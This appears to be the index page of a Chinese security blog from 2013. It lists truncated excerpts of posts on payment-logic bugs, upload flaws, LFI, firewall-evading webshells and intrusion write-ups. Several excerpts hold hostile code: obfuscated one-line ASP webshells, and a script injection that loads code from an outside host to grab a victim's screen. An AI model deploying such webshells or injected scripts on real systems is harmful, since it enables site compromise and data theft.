SDCM时代商城任意商品0元购
12年前 (2013-08-24) 1441浏览 0评论
ps:这篇文章是《支付漏洞的三种常见类型》(http://jinglingshu.org/?p=1804)的一个案例,符合第二种情况:即没有对购买数量进行限制,导致可以将数量修改为负值。 1、首先进入商城,购买任意商品,提交商品数量时抓...
12年前 (2013-08-24) 1441浏览 0评论
ps:这篇文章是《支付漏洞的三种常见类型》(http://jinglingshu.org/?p=1804)的一个案例,符合第二种情况:即没有对购买数量进行限制,导致可以将数量修改为负值。 1、首先进入商城,购买任意商品,提交商品数量时抓...
12年前 (2013-08-24) 1621浏览 0评论
这个漏洞在酷狗旗下的繁星网: fanxing.kugou.com 情景再现: 情况分析: 繁星网相册处因为对上传的文件名没有做很好的过滤,我们只要开启抓包软件 看到提交的数据是: ——...
12年前 (2013-08-23) 2595浏览 0评论
在使用xml-rpc的时候,server端获取client数据,主要是通过php输入流input,而不是$_POST数组。所以,这里主要探讨php输入流php://input。 下面的例子摘取的是wordpress中的一段代码,里面有用到http:...
12年前 (2013-08-23) 1772浏览 0评论
1.完整备份一次(保存位置当然可以改) backup database 库名 to disk = ‘c:\ddd.bak’;– 2.创建表并插曲入数据 create table [dbo].[dtest] ([cm...
12年前 (2013-08-23) 2983浏览 0评论
几个变性的asp–过防火墙 过狗效果都不错 1 <%Y=request("x")%> <%execute(Y)%> 1 <%eval (eval(chr(114)+chr(101)+c...
12年前 (2013-08-22) 9214浏览 0评论
PHP LFI读php文件源码以及直接post webshell 2013-08-17 15:25:15| 分类: 安全 |字号 订阅 最近在忙defcon的题目集训 其中有一套题目里 有个老外写的writeup中提到了LFI的另一种...
12年前 (2013-08-22) 2081浏览 0评论
较老的漏洞了,今儿扒拉出来晒晒吧:) 以下内容来至:大风 今天要讲的这个漏洞是一个非常猥琐的漏洞。 大部分网站都有这个漏洞,不光是百度。 什么是xsio xsio是因为没有限制图片的position属性为absolute,导致可以控制一张图片出现在网...
12年前 (2013-08-21) 1995浏览 0评论
Backtrack 已经内置了一个由” Offebnsive Security”提供的漏洞利用程序集的数据库Exploit-DB,可以用于平时的参考和使用。访问的方法是在命令提示符中输入一下命令: 1 # cd /pentest/expl...
12年前 (2013-08-21) 1947浏览 2评论
直到最近为止,对拥有数之不尽的独立地址的互联网进行整体扫描还是一种非常缓慢而“劳动密集型”的过程。举例来说,有人曾使用nmap进行过一次扫描,想要搜集有关加密技术在线使用量的数据。其结果是,这一过程足足花了两三个月时间。 密歇根大学研究人员觉得,他...
12年前 (2013-08-20) 2248浏览 0评论
2个月前,长短短(Sogili)在群里发了一个html2canvas.js 并给了一个POC 我写了一个完整的js来获得对方的屏幕截图 看代码 document.write("<script src=\"http:\/\/xj.hk\/h...
12年前 (2013-08-20) 1594浏览 0评论
很久很久以前剑心大叔叫我写过这样一篇文章,当时还没放假,就没去搭理他,嘿嘿。最近,小E又来找我写关于支付漏洞的文章,好吧,写就写了,趁暑假还有一点余额,就写这篇文章和大家来谈谈支付漏洞。(写得不好,大牛勿怪) ———- 根据乌云上的案例,支付漏洞一般...
12年前 (2013-08-20) 2632浏览 1评论
这几天看了下htaccess的一些东东。首先环境要支持.htaccess,apache啥的。 php的.htaccess 第一种,添加扩展 AddType application/x-httpd-php .jpg 把shell扩展名修改为...
12年前 (2013-08-20) 1775浏览 1评论
author:0x007er email:0x007er@gmail.com 说明:本文乃原创,同时也很菜 只是分享出自己一些想法 如有雷同 纯属科学现象 其实是这样的,我们平时经常看到一些漏洞扫描网站,诸如360网站安全检测 ScanV网站安全...
12年前 (2013-08-20) 2270浏览 1评论
最近几年,各种对网站安全防护的免费产品风起云涌,单机版的就算安全狗,在线的就多了安全宝啊,360网站卫士啊,云盾啊,DNSPOD都集成宝宝了,搞得很多黑客的菜刀连接不上,于是各种大法出来了。 这几天看了些文章,做个整理。 第一种,各种分号 /;.sh...
12年前 (2013-08-19) 1401浏览 0评论
Linux文件系统十问 –关于文件系统,你知道吗? 作者:yanfei,腾讯后台架构师,参与项目为搜搜网页开发和搜搜开放平台。关于文件系统,相信大家都不陌生。身为攻城狮的我们几乎天天都会与之打交道,但是细深剖一下,其中又有多少是我们理...
12年前 (2013-08-19) 2232浏览 0评论
作者:valiant、jamy 一、项目背景 图1.1 常见的图像识别应用 本项目提出的图像算法主要解决如下问题:在移动设备实时获取图像的过程中,让算法自动决定何时进行图片发送请求、何时中断发送请求,并将此策略用在实时的图像检索应用中。 目前的...
12年前 (2013-08-16) 2125浏览 1评论
1、演示站后台竟然有一个地方可上传图片,没有禁止上传。 2、上传图片简单过滤,很容易突破,上传php文件,并能执行。 3、服务器(vps)配置严重低级,拿到webshell之后直接是系统权限,windows系统,替换sethc.exe,直接远程桌面连...
12年前 (2013-08-16) 1850浏览 0评论
1:扫描Exploithub.com网站 2:发现blog WordPress 缺失wp-config.php https://www.exploithub.com/blog/ –》重新安装了该blog 3:上传shell级的phpinfo 4:备份...
12年前 (2013-08-16) 2308浏览 1评论
转自:黑客安全文献http://www.weikt.com/blog/?p=108 某年、某月、某日,某事、某刻、某分、某秒,某人、某站、某代码的分析…… 起因如下,在某时某刻,某人发过来一站及一段代码,然后求分析…… 目标地址:htt...
12年前 (2013-08-14) 1977浏览 0评论
wscript.shell 和 shell.application 这两个组件都是来执行程序的,因此是最不安全的组件。目前很多asp木马执行命令都是用的 wscript.shell ,忽略了 shell.application 。 我们可以首先在一...